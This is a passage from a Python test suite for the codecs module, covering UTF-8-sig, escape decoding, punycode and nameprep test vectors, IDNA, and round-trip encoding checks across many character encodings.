"\ufeff\x00\xff\u07ff\u0800\uffff",
"\ufeff\x00\xff\u07ff\u0800\uffff",
"\ufeff\x00\xff\u07ff\u0800\uffff",
"\ufeff\x00\xff\u07ff\u0800\uffff\U00010000",
]
)
def test_bug1601501(self):
# SF bug #1601501: check that the codec works with a buffer
self.assertEqual(str(b"\xef\xbb\xbf", "utf-8-sig"), "")
def test_bom(self):
d = codecs.getincrementaldecoder("utf-8-sig")()
s = "spam"
self.assertEqual(d.decode(s.encode("utf-8-sig")), s)
def test_stream_bom(self):
unistring = "ABC\u00A1\u2200XYZ"
bytestring = codecs.BOM_UTF8 + b"ABC\xC2\xA1\xE2\x88\x80XYZ"
reader = codecs.getreader("utf-8-sig")
for sizehint in [None] + list(range(1, 11)) + \
[64, 128, 256, 512, 1024]:
istream = reader(io.BytesIO(bytestring))
ostream = io.StringIO()
while 1:
if sizehint is not None:
data = istream.read(sizehint)
else:
data = istream.read()
if not data:
break
ostream.write(data)
got = ostream.getvalue()
self.assertEqual(got, unistring)
def test_stream_bare(self):
unistring = "ABC\u00A1\u2200XYZ"
bytestring = b"ABC\xC2\xA1\xE2\x88\x80XYZ"
reader = codecs.getreader("utf-8-sig")
for sizehint in [None] + list(range(1, 11)) + \
[64, 128, 256, 512, 1024]:
istream = reader(io.BytesIO(bytestring))
ostream = io.StringIO()
while 1:
if sizehint is not None:
data = istream.read(sizehint)
else:
data = istream.read()
if not data:
break
ostream.write(data)
got = ostream.getvalue()
self.assertEqual(got, unistring)
@yp_unittest.skip_str_codecs
class EscapeDecodeTest(yp_unittest.TestCase):
def test_empty(self):
self.assertEqual(codecs.escape_decode(b""), (b"", 0))
def test_raw(self):
decode = codecs.escape_decode
for b in range(256):
b = bytes([b])
if b != b'\\':
self.assertEqual(decode(b + b'0'), (b + b'0', 2))
def test_escape(self):
decode = codecs.escape_decode
check = coding_checker(self, decode)
check(b"[\\\n]", b"[]")
check(br'[\"]', b'["]')
check(br"[\']", b"[']")
check(br"[\\]", br"[\]")
check(br"[\a]", b"[\x07]")
check(br"[\b]", b"[\x08]")
check(br"[\t]", b"[\x09]")
check(br"[\n]", b"[\x0a]")
check(br"[\v]", b"[\x0b]")
check(br"[\f]", b"[\x0c]")
check(br"[\r]", b"[\x0d]")
check(br"[\7]", b"[\x07]")
check(br"[\8]", br"[\8]")
check(br"[\78]", b"[\x078]")
check(br"[\41]", b"[!]")
check(br"[\418]", b"[!8]")
check(br"[\101]", b"[A]")
check(br"[\1010]", b"[A0]")
check(br"[\501]", b"[A]")
check(br"[\x41]", b"[A]")
check(br"[\X41]", br"[\X41]")
check(br"[\x410]", b"[A0]")
for b in range(256):
if b not in b'\n"\'\\abtnvfr01234567x':
b = bytes([b])
check(b'\\' + b, b'\\' + b)
def test_errors(self):
decode = codecs.escape_decode
self.assertRaises(ValueError, decode, br"\x")
self.assertRaises(ValueError, decode, br"[\x]")
self.assertEqual(decode(br"[\x]\x", "ignore"), (b"[]", 6))
self.assertEqual(decode(br"[\x]\x", "replace"), (b"[?]?", 6))
self.assertRaises(ValueError, decode, br"\x0")
self.assertRaises(ValueError, decode, br"[\x0]")
self.assertEqual(decode(br"[\x0]\x0", "ignore"), (b"[]", 8))
self.assertEqual(decode(br"[\x0]\x0", "replace"), (b"[?]?", 8))
@yp_unittest.skip_str_codecs
class RecodingTest(yp_unittest.TestCase):
def test_recoding(self):
f = io.BytesIO()
f2 = codecs.EncodedFile(f, "unicode_internal", "utf-8")
f2.write("a")
f2.close()
# Python used to crash on this at exit because of a refcount
# bug in _codecsmodule.c
# From RFC 3492
punycode_testcases = [
# A Arabic (Egyptian):
("\u0644\u064A\u0647\u0645\u0627\u0628\u062A\u0643\u0644"
"\u0645\u0648\u0634\u0639\u0631\u0628\u064A\u061F",
b"egbpdaj6bu4bxfgehfvwxn"),
# B Chinese (simplified):
("\u4ED6\u4EEC\u4E3A\u4EC0\u4E48\u4E0D\u8BF4\u4E2D\u6587",
b"ihqwcrb4cv8a8dqg056pqjye"),
# C Chinese (traditional):
("\u4ED6\u5011\u7232\u4EC0\u9EBD\u4E0D\u8AAA\u4E2D\u6587",
b"ihqwctvzc91f659drss3x8bo0yb"),
# D Czech: Pro<ccaron>prost<ecaron>nemluv<iacute><ccaron>esky
("\u0050\u0072\u006F\u010D\u0070\u0072\u006F\u0073\u0074"
"\u011B\u006E\u0065\u006D\u006C\u0075\u0076\u00ED\u010D"
"\u0065\u0073\u006B\u0079",
b"Proprostnemluvesky-uyb24dma41a"),
# E Hebrew:
("\u05DC\u05DE\u05D4\u05D4\u05DD\u05E4\u05E9\u05D5\u05D8"
"\u05DC\u05D0\u05DE\u05D3\u05D1\u05E8\u05D9\u05DD\u05E2"
"\u05D1\u05E8\u05D9\u05EA",
b"4dbcagdahymbxekheh6e0a7fei0b"),
# F Hindi (Devanagari):
("\u092F\u0939\u0932\u094B\u0917\u0939\u093F\u0928\u094D"
"\u0926\u0940\u0915\u094D\u092F\u094B\u0902\u0928\u0939"
"\u0940\u0902\u092C\u094B\u0932\u0938\u0915\u0924\u0947"
"\u0939\u0948\u0902",
b"i1baa7eci9glrd9b2ae1bj0hfcgg6iyaf8o0a1dig0cd"),
#(G) Japanese (kanji and hiragana):
("\u306A\u305C\u307F\u3093\u306A\u65E5\u672C\u8A9E\u3092"
"\u8A71\u3057\u3066\u304F\u308C\u306A\u3044\u306E\u304B",
b"n8jok5ay5dzabd5bym9f0cm5685rrjetr6pdxa"),
# (H) Korean (Hangul syllables):
("\uC138\uACC4\uC758\uBAA8\uB4E0\uC0AC\uB78C\uB4E4\uC774"
"\uD55C\uAD6D\uC5B4\uB97C\uC774\uD574\uD55C\uB2E4\uBA74"
"\uC5BC\uB9C8\uB098\uC88B\uC744\uAE4C",
b"989aomsvi5e83db1d2a355cv1e0vak1dwrv93d5xbh15a0dt30a5j"
b"psd879ccm6fea98c"),
# (I) Russian (Cyrillic):
("\u043F\u043E\u0447\u0435\u043C\u0443\u0436\u0435\u043E"
"\u043D\u0438\u043D\u0435\u0433\u043E\u0432\u043E\u0440"
"\u044F\u0442\u043F\u043E\u0440\u0443\u0441\u0441\u043A"
"\u0438",
b"b1abfaaepdrnnbgefbaDotcwatmq2g4l"),
# (J) Spanish: Porqu<eacute>nopuedensimplementehablarenEspa<ntilde>ol
("\u0050\u006F\u0072\u0071\u0075\u00E9\u006E\u006F\u0070"
"\u0075\u0065\u0064\u0065\u006E\u0073\u0069\u006D\u0070"
"\u006C\u0065\u006D\u0065\u006E\u0074\u0065\u0068\u0061"
"\u0062\u006C\u0061\u0072\u0065\u006E\u0045\u0073\u0070"
"\u0061\u00F1\u006F\u006C",
b"PorqunopuedensimplementehablarenEspaol-fmd56a"),
# (K) Vietnamese:
# T<adotbelow>isaoh<odotbelow>kh<ocirc>ngth<ecirchookabove>ch\
# <ihookabove>n<oacute>iti<ecircacute>ngVi<ecircdotbelow>t
("\u0054\u1EA1\u0069\u0073\u0061\u006F\u0068\u1ECD\u006B"
"\u0068\u00F4\u006E\u0067\u0074\u0068\u1EC3\u0063\u0068"
"\u1EC9\u006E\u00F3\u0069\u0074\u0069\u1EBF\u006E\u0067"
"\u0056\u0069\u1EC7\u0074",
b"TisaohkhngthchnitingVit-kjcr8268qyxafd2f1b9g"),
#(L) 3<nen>B<gumi><kinpachi><sensei>
("\u0033\u5E74\u0042\u7D44\u91D1\u516B\u5148\u751F",
b"3B-ww4c5e180e575a65lsy2b"),
# (M) <amuro><namie>-with-SUPER-MONKEYS
("\u5B89\u5BA4\u5948\u7F8E\u6075\u002D\u0077\u0069\u0074"
"\u0068\u002D\u0053\u0055\u0050\u0045\u0052\u002D\u004D"
"\u004F\u004E\u004B\u0045\u0059\u0053",
b"-with-SUPER-MONKEYS-pc58ag80a8qai00g7n9n"),
# (N) Hello-Another-Way-<sorezore><no><basho>
("\u0048\u0065\u006C\u006C\u006F\u002D\u0041\u006E\u006F"
"\u0074\u0068\u0065\u0072\u002D\u0057\u0061\u0079\u002D"
"\u305D\u308C\u305E\u308C\u306E\u5834\u6240",
b"Hello-Another-Way--fc4qua05auwb3674vfr0b"),
# (O) <hitotsu><yane><no><shita>2
("\u3072\u3068\u3064\u5C4B\u6839\u306E\u4E0B\u0032",
b"2-u9tlzr9756bt3uc0v"),
# (P) Maji<de>Koi<suru>5<byou><mae>
("\u004D\u0061\u006A\u0069\u3067\u004B\u006F\u0069\u3059"
"\u308B\u0035\u79D2\u524D",
b"MajiKoi5-783gue6qz075azm5e"),
# (Q) <pafii>de<runba>
("\u30D1\u30D5\u30A3\u30FC\u0064\u0065\u30EB\u30F3\u30D0",
b"de-jg4avhby1noc0d"),
# (R) <sono><supiido><de>
("\u305D\u306E\u30B9\u30D4\u30FC\u30C9\u3067",
b"d9juau41awczczp"),
# (S) -> $1.00 <-
("\u002D\u003E\u0020\u0024\u0031\u002E\u0030\u0030\u0020"
"\u003C\u002D",
b"-> $1.00 <--")
]
for i in punycode_testcases:
if len(i)!=2:
print(repr(i))
@yp_unittest.skip_str_codecs
class PunycodeTest(yp_unittest.TestCase):
def test_encode(self):
for uni, puny in punycode_testcases:
# Need to convert both strings to lower case, since
# some of the extended encodings use upper case, but our
# code produces only lower case. Converting just puny to
# lower is also insufficient, since some of the input characters
# are upper case.
self.assertEqual(
str(uni.encode("punycode"), "ascii").lower(),
str(puny, "ascii").lower()
)
def test_decode(self):
for uni, puny in punycode_testcases:
self.assertEqual(uni, puny.decode("punycode"))
puny = puny.decode("ascii").encode("ascii")
self.assertEqual(uni, puny.decode("punycode"))
@yp_unittest.skip_str_codecs
class UnicodeInternalTest(yp_unittest.TestCase):
@yp_unittest.skipUnless(SIZEOF_WCHAR_T == 4, 'specific to 32-bit wchar_t')
def test_bug1251300(self):
# Decoding with unicode_internal used to not correctly handle "code
ok = [
(b"\x00\x10\xff\xff", "\U0010ffff"),
(b"\x00\x00\x01\x01", "\U00000101"),
(b"", ""),
]
not_ok = [
b"\x7f\xff\xff\xff",
b"\x80\x00\x00\x00",
b"\x81\x00\x00\x00",
b"\x00",
b"\x00\x00\x00\x00\x00",
]
for internal, uni in ok:
if sys.byteorder == "little":
internal = bytes(reversed(internal))
with support.check_warnings():
self.assertEqual(uni, internal.decode("unicode_internal"))
for internal in not_ok:
if sys.byteorder == "little":
internal = bytes(reversed(internal))
with support.check_warnings(('unicode_internal codec has been '
'deprecated', DeprecationWarning)):
self.assertRaises(UnicodeDecodeError, internal.decode,
"unicode_internal")
if sys.byteorder == "little":
invalid = b"\x00\x00\x11\x00"
else:
invalid = b"\x00\x11\x00\x00"
with support.check_warnings():
self.assertRaises(UnicodeDecodeError,
invalid.decode, "unicode_internal")
with support.check_warnings():
self.assertEqual(invalid.decode("unicode_internal", "replace"),
'\ufffd')
@yp_unittest.skipUnless(SIZEOF_WCHAR_T == 4, 'specific to 32-bit wchar_t')
def test_decode_error_attributes(self):
try:
with support.check_warnings(('unicode_internal codec has been '
'deprecated', DeprecationWarning)):
b"\x00\x00\x00\x00\x00\x11\x11\x00".decode("unicode_internal")
except UnicodeDecodeError as ex:
self.assertEqual("unicode_internal", ex.encoding)
self.assertEqual(b"\x00\x00\x00\x00\x00\x11\x11\x00", ex.object)
self.assertEqual(4, ex.start)
self.assertEqual(8, ex.end)
else:
self.fail()
@yp_unittest.skipUnless(SIZEOF_WCHAR_T == 4, 'specific to 32-bit wchar_t')
def test_decode_callback(self):
codecs.register_error("UnicodeInternalTest", codecs.ignore_errors)
decoder = codecs.getdecoder("unicode_internal")
with support.check_warnings(('unicode_internal codec has been '
'deprecated', DeprecationWarning)):
ab = "ab".encode("unicode_internal").decode()
ignored = decoder(bytes("%s\x22\x22\x22\x22%s" % (ab[:4], ab[4:]),
"ascii"),
"UnicodeInternalTest")
self.assertEqual(("ab", 12), ignored)
def test_encode_length(self):
with support.check_warnings(('unicode_internal codec has been '
'deprecated', DeprecationWarning)):
# Issue 3739
encoder = codecs.getencoder("unicode_internal")
self.assertEqual(encoder("a")[1], 1)
self.assertEqual(encoder("\xe9\u0142")[1], 2)
self.assertEqual(codecs.escape_encode(br'\x00')[1], 4)
# From http://www.gnu.org/software/libidn/draft-josefsson-idn-test-vectors.html
nameprep_tests = [
# 3.1 Map to nothing.
(b'foo\xc2\xad\xcd\x8f\xe1\xa0\x86\xe1\xa0\x8bbar'
b'\xe2\x80\x8b\xe2\x81\xa0baz\xef\xb8\x80\xef\xb8\x88\xef'
b'\xb8\x8f\xef\xbb\xbf',
b'foobarbaz'),
# 3.2 Case folding ASCII U+0043 U+0041 U+0046 U+0045.
(b'CAFE',
b'cafe'),
# 3.3 Case folding 8bit U+00DF (german sharp s).
# The original test case is bogus; it says \xc3\xdf
(b'\xc3\x9f',
b'ss'),
# 3.4 Case folding U+0130 (turkish capital I with dot).
(b'\xc4\xb0',
b'i\xcc\x87'),
# 3.5 Case folding multibyte U+0143 U+037A.
(b'\xc5\x83\xcd\xba',
b'\xc5\x84 \xce\xb9'),
# 3.6 Case folding U+2121 U+33C6 U+1D7BB.
# XXX: skip this as it fails in UCS-2 mode
#('\xe2\x84\xa1\xe3\x8f\x86\xf0\x9d\x9e\xbb',
# 'telc\xe2\x88\x95kg\xcf\x83'),
(None, None),
# 3.7 Normalization of U+006a U+030c U+00A0 U+00AA.
(b'j\xcc\x8c\xc2\xa0\xc2\xaa',
b'\xc7\xb0 a'),
# 3.8 Case folding U+1FB7 and normalization.
(b'\xe1\xbe\xb7',
b'\xe1\xbe\xb6\xce\xb9'),
# 3.9 Self-reverting case folding U+01F0 and normalization.
# The original test case is bogus, it says `\xc7\xf0'
(b'\xc7\xb0',
b'\xc7\xb0'),
# 3.10 Self-reverting case folding U+0390 and normalization.
(b'\xce\x90',
b'\xce\x90'),
# 3.11 Self-reverting case folding U+03B0 and normalization.
(b'\xce\xb0',
b'\xce\xb0'),
# 3.12 Self-reverting case folding U+1E96 and normalization.
(b'\xe1\xba\x96',
b'\xe1\xba\x96'),
# 3.13 Self-reverting case folding U+1F56 and normalization.
(b'\xe1\xbd\x96',
b'\xe1\xbd\x96'),
# 3.14 ASCII space character U+0020.
(b' ',
b' '),
# 3.15 Non-ASCII 8bit space character U+00A0.
(b'\xc2\xa0',
b' '),
# 3.16 Non-ASCII multibyte space character U+1680.
(b'\xe1\x9a\x80',
None),
# 3.17 Non-ASCII multibyte space character U+2000.
(b'\xe2\x80\x80',
b' '),
# 3.18 Zero Width Space U+200b.
(b'\xe2\x80\x8b',
b''),
# 3.19 Non-ASCII multibyte space character U+3000.
(b'\xe3\x80\x80',
b' '),
# 3.20 ASCII control characters U+0010 U+007F.
(b'\x10\x7f',
b'\x10\x7f'),
# 3.21 Non-ASCII 8bit control character U+0085.
(b'\xc2\x85',
None),
# 3.22 Non-ASCII multibyte control character U+180E.
(b'\xe1\xa0\x8e',
None),
# 3.23 Zero Width No-Break Space U+FEFF.
(b'\xef\xbb\xbf',
b''),
# 3.24 Non-ASCII control character U+1D175.
(b'\xf0\x9d\x85\xb5',
None),
# 3.25 Plane 0 private use character U+F123.
(b'\xef\x84\xa3',
None),
# 3.26 Plane 15 private use character U+F1234.
(b'\xf3\xb1\x88\xb4',
None),
# 3.27 Plane 16 private use character U+10F234.
(b'\xf4\x8f\x88\xb4',
None),
# 3.28 Non-character code point U+8FFFE.
(b'\xf2\x8f\xbf\xbe',
None),
# 3.29 Non-character code point U+10FFFF.
(b'\xf4\x8f\xbf\xbf',
None),
# 3.30 Surrogate code U+DF42.
(b'\xed\xbd\x82',
None),
# 3.31 Non-plain text character U+FFFD.
(b'\xef\xbf\xbd',
None),
# 3.32 Ideographic description character U+2FF5.
(b'\xe2\xbf\xb5',
None),
# 3.33 Display property character U+0341.
(b'\xcd\x81',
b'\xcc\x81'),
# 3.34 Left-to-right mark U+200E.
(b'\xe2\x80\x8e',
None),
# 3.35 Deprecated U+202A.
(b'\xe2\x80\xaa',
None),
# 3.36 Language tagging character U+E0001.
(b'\xf3\xa0\x80\x81',
None),
# 3.37 Language tagging character U+E0042.
(b'\xf3\xa0\x81\x82',
None),
# 3.38 Bidi: RandALCat character U+05BE and LCat characters.
(b'foo\xd6\xbebar',
None),
# 3.39 Bidi: RandALCat character U+FD50 and LCat characters.
(b'foo\xef\xb5\x90bar',
None),
# 3.40 Bidi: RandALCat character U+FB38 and LCat characters.
(b'foo\xef\xb9\xb6bar',
b'foo \xd9\x8ebar'),
# 3.41 Bidi: RandALCat without trailing RandALCat U+0627 U+0031.
(b'\xd8\xa71',
None),
# 3.42 Bidi: RandALCat character U+0627 U+0031 U+0628.
(b'\xd8\xa71\xd8\xa8',
b'\xd8\xa71\xd8\xa8'),
# 3.43 Unassigned code point U+E0002.
# Skip this test as we allow unassigned
#(b'\xf3\xa0\x80\x82',
# None),
(None, None),
# 3.44 Larger test (shrinking).
# Original test case reads \xc3\xdf
(b'X\xc2\xad\xc3\x9f\xc4\xb0\xe2\x84\xa1j\xcc\x8c\xc2\xa0\xc2'
b'\xaa\xce\xb0\xe2\x80\x80',
b'xssi\xcc\x87tel\xc7\xb0 a\xce\xb0 '),
# 3.45 Larger test (expanding).
# Original test case reads \xc3\x9f
(b'X\xc3\x9f\xe3\x8c\x96\xc4\xb0\xe2\x84\xa1\xe2\x92\x9f\xe3\x8c'
b'\x80',
b'xss\xe3\x82\xad\xe3\x83\xad\xe3\x83\xa1\xe3\x83\xbc\xe3'
b'\x83\x88\xe3\x83\xabi\xcc\x87tel\x28d\x29\xe3\x82'
b'\xa2\xe3\x83\x91\xe3\x83\xbc\xe3\x83\x88')
]
@yp_unittest.skip_str_codecs
class NameprepTest(yp_unittest.TestCase):
def test_nameprep(self):
from encodings.idna import nameprep
for pos, (orig, prepped) in enumerate(nameprep_tests):
if orig is None:
# Skipped
continue
# The Unicode strings are given in UTF-8
orig = str(orig, "utf-8", "surrogatepass")
if prepped is None:
# Input contains prohibited characters
self.assertRaises(UnicodeError, nameprep, orig)
else:
prepped = str(prepped, "utf-8", "surrogatepass")
try:
self.assertEqual(nameprep(orig), prepped)
except Exception as e:
raise support.TestFailed("Test 3.%d: %s" % (pos+1, str(e)))
@yp_unittest.skip_str_codecs
class IDNACodecTest(yp_unittest.TestCase):
def test_builtin_decode(self):
self.assertEqual(str(b"python.org", "idna"), "python.org")
self.assertEqual(str(b"python.org.", "idna"), "python.org.")
self.assertEqual(str(b"xn--pythn-mua.org", "idna"), "pyth\xf6n.org")
self.assertEqual(str(b"xn--pythn-mua.org.", "idna"), "pyth\xf6n.org.")
def test_builtin_encode(self):
self.assertEqual("python.org".encode("idna"), b"python.org")
self.assertEqual("python.org.".encode("idna"), b"python.org.")
self.assertEqual("pyth\xf6n.org".encode("idna"), b"xn--pythn-mua.org")
self.assertEqual("pyth\xf6n.org.".encode("idna"), b"xn--pythn-mua.org.")
def test_stream(self):
r = codecs.getreader("idna")(io.BytesIO(b"abc"))
r.read(3)
self.assertEqual(r.read(), "")
def test_incremental_decode(self):
self.assertEqual(
"".join(codecs.iterdecode((bytes([c]) for c in b"python.org"), "idna")),
"python.org"
)
self.assertEqual(
"".join(codecs.iterdecode((bytes([c]) for c in b"python.org."), "idna")),
"python.org."
)
self.assertEqual(
"".join(codecs.iterdecode((bytes([c]) for c in b"xn--pythn-mua.org."), "idna")),
"pyth\xf6n.org."
)
self.assertEqual(
"".join(codecs.iterdecode((bytes([c]) for c in b"xn--pythn-mua.org."), "idna")),
"pyth\xf6n.org."
)
decoder = codecs.getincrementaldecoder("idna")()
self.assertEqual(decoder.decode(b"xn--xam", ), "")
self.assertEqual(decoder.decode(b"ple-9ta.o", ), "\xe4xample.")
self.assertEqual(decoder.decode(b"rg"), "")
self.assertEqual(decoder.decode(b"", True), "org")
decoder.reset()
self.assertEqual(decoder.decode(b"xn--xam", ), "")
self.assertEqual(decoder.decode(b"ple-9ta.o", ), "\xe4xample.")
self.assertEqual(decoder.decode(b"rg."), "org.")
self.assertEqual(decoder.decode(b"", True), "")
def test_incremental_encode(self):
self.assertEqual(
b"".join(codecs.iterencode("python.org", "idna")),
b"python.org"
)
self.assertEqual(
b"".join(codecs.iterencode("python.org.", "idna")),
b"python.org."
)
self.assertEqual(
b"".join(codecs.iterencode("pyth\xf6n.org.", "idna")),
b"xn--pythn-mua.org."
)
self.assertEqual(
b"".join(codecs.iterencode("pyth\xf6n.org.", "idna")),
b"xn--pythn-mua.org."
)
encoder = codecs.getincrementalencoder("idna")()
self.assertEqual(encoder.encode("\xe4x"), b"")
self.assertEqual(encoder.encode("ample.org"), b"xn--xample-9ta.")
self.assertEqual(encoder.encode("", True), b"org")
encoder.reset()
self.assertEqual(encoder.encode("\xe4x"), b"")
self.assertEqual(encoder.encode("ample.org."), b"xn--xample-9ta.org.")
self.assertEqual(encoder.encode("", True), b"")
@yp_unittest.skip_str_codecs
class CodecsModuleTest(yp_unittest.TestCase):
def test_decode(self):
self.assertEqual(codecs.decode(b'\xe4\xf6\xfc', 'latin-1'),
'\xe4\xf6\xfc')
self.assertRaises(TypeError, codecs.decode)
self.assertEqual(codecs.decode(b'abc'), 'abc')
self.assertRaises(UnicodeDecodeError, codecs.decode, b'\xff', 'ascii')
def test_encode(self):
self.assertEqual(codecs.encode('\xe4\xf6\xfc', 'latin-1'),
b'\xe4\xf6\xfc')
self.assertRaises(TypeError, codecs.encode)
self.assertRaises(LookupError, codecs.encode, "foo", "__spam__")
self.assertEqual(codecs.encode('abc'), b'abc')
self.assertRaises(UnicodeEncodeError, codecs.encode, '\xffff', 'ascii')
def test_register(self):
self.assertRaises(TypeError, codecs.register)
self.assertRaises(TypeError, codecs.register, 42)
def test_lookup(self):
self.assertRaises(TypeError, codecs.lookup)
self.assertRaises(LookupError, codecs.lookup, "__spam__")
self.assertRaises(LookupError, codecs.lookup, " ")
def test_getencoder(self):
self.assertRaises(TypeError, codecs.getencoder)
self.assertRaises(LookupError, codecs.getencoder, "__spam__")
def test_getdecoder(self):
self.assertRaises(TypeError, codecs.getdecoder)
self.assertRaises(LookupError, codecs.getdecoder, "__spam__")
def test_getreader(self):
self.assertRaises(TypeError, codecs.getreader)
self.assertRaises(LookupError, codecs.getreader, "__spam__")
def test_getwriter(self):
self.assertRaises(TypeError, codecs.getwriter)
self.assertRaises(LookupError, codecs.getwriter, "__spam__")
def test_lookup_issue1813(self):
# Issue #1813: under Turkish locales, lookup of some codecs failed
# because 'I' is lowercased as "ı" (dotless i)
oldlocale = locale.setlocale(locale.LC_CTYPE)
self.addCleanup(locale.setlocale, locale.LC_CTYPE, oldlocale)
try:
locale.setlocale(locale.LC_CTYPE, 'tr_TR')
except locale.Error:
# Unsupported locale on this system
self.skipTest('test needs Turkish locale')
c = codecs.lookup('ASCII')
self.assertEqual(c.name, 'ascii')
@yp_unittest.skip_str_codecs
class StreamReaderTest(yp_unittest.TestCase):
def setUp(self):
self.reader = codecs.getreader('utf-8')
self.stream = io.BytesIO(b'\xed\x95\x9c\n\xea\xb8\x80')
def test_readlines(self):
f = self.reader(self.stream)
self.assertEqual(f.readlines(), ['\ud55c\n', '\uae00'])
@yp_unittest.skip_str_codecs
class EncodedFileTest(yp_unittest.TestCase):
def test_basic(self):
f = io.BytesIO(b'\xed\x95\x9c\n\xea\xb8\x80')
ef = codecs.EncodedFile(f, 'utf-16-le', 'utf-8')
self.assertEqual(ef.read(), b'\\\xd5\n\x00\x00\xae')
f = io.BytesIO()
ef = codecs.EncodedFile(f, 'utf-8', 'latin-1')
ef.write(b'\xc3\xbc')
self.assertEqual(f.getvalue(), b'\xfc')
all_unicode_encodings = [
"ascii",
"big5",
"big5hkscs",
"charmap",
"cp037",
"cp1006",
"cp1026",
"cp1125",
"cp1140",
"cp1250",
"cp1251",
"cp1252",
"cp1253",
"cp1254",
"cp1255",
"cp1256",
"cp1257",
"cp1258",
"cp424",
"cp437",
"cp500",
"cp720",
"cp737",
"cp775",
"cp850",
"cp852",
"cp855",
"cp856",
"cp857",
"cp858",
"cp860",
"cp861",
"cp862",
"cp863",
"cp864",
"cp865",
"cp866",
"cp869",
"cp874",
"cp875",
"cp932",
"cp949",
"cp950",
"euc_jis_2004",
"euc_jisx0213",
"euc_jp",
"euc_kr",
"gb18030",
"gb2312",
"gbk",
"hp_roman8",
"hz",
"idna",
"iso2022_jp",
"iso2022_jp_1",
"iso2022_jp_2",
"iso2022_jp_2004",
"iso2022_jp_3",
"iso2022_jp_ext",
"iso2022_kr",
"iso8859_1",
"iso8859_10",
"iso8859_11",
"iso8859_13",
"iso8859_14",
"iso8859_15",
"iso8859_16",
"iso8859_2",
"iso8859_3",
"iso8859_4",
"iso8859_5",
"iso8859_6",
"iso8859_7",
"iso8859_8",
"iso8859_9",
"johab",
"koi8_r",
"koi8_u",
"latin_1",
"mac_cyrillic",
"mac_greek",
"mac_iceland",
"mac_latin2",
"mac_roman",
"mac_turkish",
"palmos",
"ptcp154",
"punycode",
"raw_unicode_escape",
"shift_jis",
"shift_jis_2004",
"shift_jisx0213",
"tis_620",
"unicode_escape",
"unicode_internal",
"utf_16",
"utf_16_be",
"utf_16_le",
"utf_7",
"utf_8",
]
if hasattr(codecs, "mbcs_encode"):
all_unicode_encodings.append("mbcs")
# The following encoding is not tested, because it's not supposed
# to work:
# "undefined"
# The following encodings don't work in stateful mode
broken_unicode_with_streams = [
"punycode",
"unicode_internal"
]
broken_incremental_coders = broken_unicode_with_streams + [
"idna",
]
@yp_unittest.skip_str_codecs
class BasicUnicodeTest(yp_unittest.TestCase, MixInCheckStateHandling):
def test_basics(self):
s = "abc123" # all codecs should be able to encode these
for encoding in all_unicode_encodings:
name = codecs.lookup(encoding).name
if encoding.endswith("_codec"):
name += "_codec"
elif encoding == "latin_1":
name = "latin_1"
self.assertEqual(encoding.replace("_", "-"), name.replace("_", "-"))
with support.check_warnings():
# unicode-internal has been deprecated
(b, size) = codecs.getencoder(encoding)(s)
self.assertEqual(size, len(s), "encoding=%r" % encoding)
(chars, size) = codecs.getdecoder(encoding)(b)
self.assertEqual(chars, s, "encoding=%r" % encoding)
if encoding not in broken_unicode_with_streams:
# check stream reader/writer
q = Queue(b"")
writer = codecs.getwriter(encoding)(q)
encodedresult = b""
for c in s:
writer.write(c)
chunk = q.read()
self.assertTrue(type(chunk) is bytes, type(chunk))
encodedresult += chunk
q = Queue(b"")
reader = codecs.getreader(encoding)(q)
decodedresult = ""
for c in encodedresult:
q.write(bytes([c]))
decodedresult += reader.read()
self.assertEqual(decodedresult, s, "encoding=%r" % encoding)
if encoding not in broken_incremental_coders:
# check incremental decoder/encoder and iterencode()/iterdecode()
try:
encoder = codecs.getincrementalencoder(encoding)()
except LookupError: # no IncrementalEncoder
pass
else:
# check incremental decoder/encoder
encodedresult = b""
for c in s:
encodedresult += encoder.encode(c)
encodedresult += encoder.encode("", True)
decoder = codecs.getincrementaldecoder(encoding)()
decodedresult = ""
for c in encodedresult:
decodedresult += decoder.decode(bytes([c]))
decodedresult += decoder.decode(b"", True)
self.assertEqual(decodedresult, s,
"encoding=%r" % encoding)
# check iterencode()/iterdecode()
result = "".join(codecs.iterdecode(
codecs.iterencode(s, encoding), encoding))
self.assertEqual(result, s, "encoding=%r" % encoding)
# check iterencode()/iterdecode() with empty string
result = "".join(codecs.iterdecode(
codecs.iterencode("", encoding), encoding))
self.assertEqual(result, "")
if encoding not in ("idna", "mbcs"):
# check incremental decoder/encoder with errors argument
try:
encoder = codecs.getincrementalencoder(encoding)("ignore")
except LookupError: # no IncrementalEncoder
pass
else:
encodedresult = b"".join(encoder.encode(c) for c in s)
decoder = codecs.getincrementaldecoder(encoding)("ignore")
decodedresult = "".join(decoder.decode(bytes([c]))
for c in encodedresult)
self.assertEqual(decodedresult, s,
"encoding=%r" % encoding)
@support.cpython_only
def test_basics_capi(self):
from _testcapi import codec_incrementalencoder, codec_incrementaldecoder
s = "abc123" # all codecs should be able to encode these
for encoding in all_unicode_encodings:
if encoding not in broken_incremental_coders:
# check incremental decoder/encoder (fetched via the C API)
try:
cencoder = codec_incrementalencoder(encoding)
except LookupError: # no IncrementalEncoder
pass
else:
# check C API
encodedresult = b""
for c in s:
encodedresult += cencoder.encode(c)
encodedresult += cencoder.encode("", True)
cdecoder = codec_incrementaldecoder(encoding)
decodedresult = ""
for c in encodedresult:
decodedresult += cdecoder.decode(bytes([c]))
decodedresult += cdecoder.decode(b"", True)
self.assertEqual(decodedresult, s,
"encoding=%r" % encoding)
if encoding not in ("idna", "mbcs"):
# check incremental decoder/encoder with errors argument
try:
cencoder = codec_incrementalencoder(encoding, "ignore")
except LookupError: # no IncrementalEncoder
pass
else:
encodedresult = b"".join(cencoder.encode(c) for c in s)
cdecoder = codec_incrementaldecoder(encoding, "ignore")
decodedresult = "".join(cdecoder.decode(bytes([c]))
for c in encodedresult)
self.assertEqual(decodedresult, s,
"encoding=%r" % encoding)
def test_seek(self):
# all codecs should be able to encode these
s = "%s\n%s\n" % (100*"abc123", 100*"def456")
for encoding in all_unicode_encodings:
if encoding == "idna": # FIXME: See SF bug #1163178
continue
if encoding in broken_unicode_with_streams:
continue
reader = codecs.getreader(encoding)(io.BytesIO(s.encode(encoding)))
for t in range(5):
# Test that calling seek resets the internal codec state and buffers
reader.seek(0, 0)
data = reader.read()
self.assertEqual(s, data)
def test_bad_decode_args(self):
for encoding in all_unicode_encodings:
decoder = codecs.getdecoder(encoding)
self.assertRaises(TypeError, decoder)
if encoding not in ("idna", "punycode"):
self.assertRaises(TypeError, decoder, 42)
def test_bad_encode_args(self):
for encoding in all_unicode_encodings:
encoder = codecs.getencoder(encoding)
with support.check_warnings():
# unicode-internal has been deprecated
self.assertRaises(TypeError, encoder)
def test_encoding_map_type_initialized(self):
from encodings import cp1140
